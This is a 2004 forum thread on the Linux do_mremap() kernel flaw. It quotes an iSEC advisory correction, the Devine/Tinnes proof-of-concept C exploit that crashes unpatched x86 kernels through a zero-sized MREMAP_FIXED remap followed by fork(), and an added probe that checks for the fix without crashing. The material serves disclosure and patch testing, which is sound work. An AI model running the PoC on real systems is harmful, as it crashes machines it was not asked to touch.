Take a look at this:
http://www.infoworld.com/article/04/01/ ... ole_1.html
That's strange. Two flaws in the kernel!!! I thought they changed the VM in the 2.6 series???
Regards
Zaeem
Critical Kernel vulnerability
Re: Critical Kernel vulnerability
Dear Zaeemarshad,
Salam,
It is, but not in 2.6.1-rc1. From http://isec.pl/vulnerabilities/isec-0013-mremap.txt:
And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2:
Don't allow mremap of zero-sized areas.
The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, whereas you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3, so I suspect it would have the patch?
Best Regards.
Salam,
zaeemarshad wrote:Take a look at this:
http://www.infoworld.com/article/04/01/ ... ole_1.html
That's strange. Two flaws in the kernel!!! I thought they changed the VM in the 2.6 series???
Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl>
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
our initial posting contains a mistake about the vulnerability of the 2.2 kernel series. Since the 2.2 kernel series doesn't support the MREMAP_FIXED flag it is NOT vulnerable. The source states "MREMAP_FIXED option added 5-Dec-1999" but it didn't make it into recent 2.2.x. We apologize for the inconvenience.
- --
Paul Starzetz
iSEC Security Research
http://isec.pl/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE/+uKwC+8U3Z5wpu4RAqd0AJ4m0jn+BBYuxgZC3ZDRgwl4u7MsNACeNzGB
4DstLw+HNr703e19zrA3cjg=
=5S9B
-----END PGP SIGNATURE-----
Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr>
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code
The following program can be used to test if a x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.
$ cat mremap_poc.c
/*
 * Proof-of-concept exploit code for do_mremap()
 *
 * Copyright (C) 2004 Christophe Devine and Julien Tinnes
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED   2

/* Issue the raw mremap system call through the old kernel/glibc
 * _syscall5 macro, so the zero-length arguments reach the kernel
 * exactly as written and are not touched by a libc wrapper. */
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    /* Two anonymous pages to serve as the source of the remap. */
    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    /* old_size == new_size == 0 with MREMAP_FIXED, targeting 0xC0000000
     * (PAGE_OFFSET, the user/kernel boundary on 32-bit x86): the call an
     * unpatched do_mremap() accepts instead of rejecting. */
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    /* On a vulnerable kernel the process is now left with broken VMA
     * bookkeeping; the fork() is what triggers the failure. */
    fork();

    return( 0 );
}
Farrukh Ahmed
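Added example, not part of any post in this thread and not the iSEC advisory or the Devine/Tinnes code above: a C probe that checks a running Linux kernel for the behaviour Farrukh quotes from the 2.6.1-rc2 changelog ("Don't allow mremap of zero-sized areas") without the fork() that the PoC uses to crash a vulnerable system. It issues the same zero-length MREMAP_MAYMOVE | MREMAP_FIXED call through glibc's mremap(), aimed at a page-aligned address of its own instead of the PoC's hard-coded 0xC0000000 (which is specific to 32-bit x86), and expects EINVAL. A second function shows the ordinary use of the same API for contrast. The function names, the two-page layout and the 0x41-filled sample buffer are assumptions of this example only.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MREMAP_MAYMOVE
#define MREMAP_MAYMOVE 1
#endif
#ifndef MREMAP_FIXED
#define MREMAP_FIXED 2
#endif

/*
 * Probe the zero-sized remap the PoC relies on (example code, not from
 * the advisory).  Returns 1 if the kernel refused it with EINVAL (the
 * fixed behaviour), 0 if the call succeeded or failed with some other
 * errno (worth investigating), -1 if the probe could not be set up.
 */
int zero_size_mremap_rejected(void)
{
#ifndef __linux__
    return -1;                      /* mremap(2) and its flags are Linux-only */
#else
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return -1;

    /* Source mapping as in the PoC, plus a scratch mapping whose
     * page-aligned user-space address stands in for 0xC0000000 so the
     * probe is meaningful on 64-bit kernels too (assumed layout). */
    void *src = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    void *target = mmap(NULL, page, PROT_NONE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (src == MAP_FAILED || target == MAP_FAILED)
        return -1;

    errno = 0;
    void *r = mremap(src, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, target);
    int rejected = (r == MAP_FAILED && errno == EINVAL);

    munmap(src, 2 * page);
    munmap(target, page);           /* no-op if the kernel already unmapped it */
    return rejected;
#endif
}

/*
 * The legitimate use of the same API, for contrast: grow a one-page
 * private mapping to two pages with MREMAP_MAYMOVE and confirm the
 * contents survived.  Returns 1 on success, 0 if mremap failed or the
 * data was lost, -1 if the probe could not be set up.
 */
int mremap_grow_preserves_data(void)
{
#ifndef __linux__
    return -1;
#else
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0)
        return -1;

    char *p = mmap(NULL, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    memset(p, 0x41, page);          /* constructed sample content */

    char *q = mremap(p, page, 2 * page, MREMAP_MAYMOVE);
    if (q == MAP_FAILED) {
        munmap(p, page);
        return 0;
    }
    int ok = (q[0] == 0x41 && q[page - 1] == 0x41);
    munmap(q, 2 * page);
    return ok;
#endif
}

int main(void)
{
    int z = zero_size_mremap_rejected();
    int g = mremap_grow_preserves_data();
    printf("zero-sized mremap rejected with EINVAL: %s\n",
           z == 1 ? "yes" : z == 0 ? "NO (investigate)" : "probe unavailable");
    printf("normal MREMAP_MAYMOVE grow keeps data:   %s\n",
           g == 1 ? "yes" : g == 0 ? "no" : "probe unavailable");
    return (z == 1) ? 0 : 1;
}
```

Build with `gcc -Wall -o mremap_probe mremap_probe.c` and run as an ordinary user; a non-zero exit status means the kernel did not return EINVAL for the zero-sized request, which is the condition the 2.6.1-rc2 fix is meant to guarantee. The probe deliberately does not fork() afterwards, so on a kernel that is still missing the fix it reports the problem instead of reproducing the crash.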